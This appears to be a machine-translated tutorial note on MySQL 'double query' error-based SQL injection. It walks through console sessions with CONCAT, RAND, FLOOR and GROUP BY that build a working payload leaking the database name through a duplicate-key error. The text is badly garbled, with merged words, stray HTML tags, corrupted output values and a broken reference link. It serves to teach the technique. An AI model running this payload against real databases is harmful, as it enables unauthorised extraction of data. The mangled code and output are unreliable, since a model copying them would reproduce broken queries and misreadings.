Double Query note

Double Query injection: It is also a kind of error injection;

For more information, please refer to: http://www.2cto.com/Article/201211/166268.html

Mysql> Select(Select Database());+---------------------+|(Select Database())|+---------------------+|Security|+---------------------+1Rowinch Set(0.00Sec

Mysql> SelectConcat ((Select Database()));+-----------------------------+|Concat ((Select Database()))|+-----------------------------+|Security|+-----------------------------+1Rowinch Set(0.00Sec<Br><Br>Note: The concat function is to link two strings together;<Br>Mysql> SelectConcat'a','b');<Br>+-----------------+<br>| concat (' A ', ' B ') |<br>+-----------------+<br>| AB |<br>+---- -------------+

MySQL>Selectrand(); + -- ------------------+ | Rand ()             | + -- ------------------+ | 0.6080478007048814 | + -- ------------------+<br><br> Note: The RAND function is a random function, so each occurrence of a value is different; a value between 0-1 appears;

Mysql> Select  Floor(Rand()*2);+-----------------+|  Floor(Rand()*2)|+-----------------+|               1 |+-----------------+<br><br> Note: The floor function is to take the decimal to complete;

Mysql> SelectConcat ((Select Database()), Floor(Rand()*2)) asTest fromInformation_schema.tablesGroup  bytest;+-----------+|Test|+-----------+|Security0||Security1|

Now let's take a look at some of the blasting tests:

Mysql> Select Count(*), Concat ((Select Database()), Floor(Rand()*2)) asTest fromInformation_schema.tablesGroup  bytest;+----------+-----------+| Count(*)|Test|+----------+-----------+|        - |Security0||        the |Security1|+----------+-----------+2Rowsinch Set(0.00Sec

Mysql> Select Count(*), Concat ((Select Database()), Floor(Rand()*2)) asTest fromInformation_schema.tablesGroup  bytest; ERROR1062(23000): Duplicate Entry'security0'  for Key 'Group_key'

We get the data.

The last error is the most important place! Duplicate key value; then why is the key value repeated, because the concat function is executed two times, because Concat is connected to two random strings, when the second execution, it is possible to duplicate the first key value of the case! Then in this case, you will get an error! That is: Using aggregate functions,GroupBy clause and the use of random functions to generate errors when running, due to the involved random function and aggregation function calculation; When a grouping statement is used after an aggregate function, such as count, a part of the query is displayed in error form, because the CONCAT function executes two times, such as Select Database(), so that it executes two times the SelectDatabase, and the subsequent random function linked together, may be random repetition, will be error; Of course you don't have to ask me why MySQL is so! I do not know about the principle, after my tireless efforts and the small partners finally fix the way to explode the data through floor error is the group BY statement error. GroupThe cause of the by statement error is the floor (random (0)*2), which could be 0 or 1 (Group  byThe principle of key is to iterate through each row of the data and save the results in a temporary table. When reading key for each row, if key exists in the staging table, the data in the temporary table is not updated in the staging table, and if the key does not exist in the staging table, the data for the row of key is inserted in the temporary table.Group  by  Floor(Random (0)*2The reason for the error is that key is a random number and the floor is calculated when the key exists in the temporary table (random (0)*2May be 0, if the temporary table has only a key of 1 of the row does not exist a key 0 of the row, then the database to insert the record into the temporary table, because it is a random number, interpolation and calculate a random value, the floor (random (0)*2The result may be 1, which causes an error when inserting a conflict. That is, the value of the random number is computed twice at the time of detection and insertion. The conclusion is: when compared with the value in the temporary table, if it is different, it is inserted, but the insertion time is calculated once, so if the value calculated when inserting is not the same as the value of the direct comparison, then the error! Specific principle reference: http://Www.mysqlops.com/ -/ to/ the/Mysql-Sql-analyze.html).

Double Query note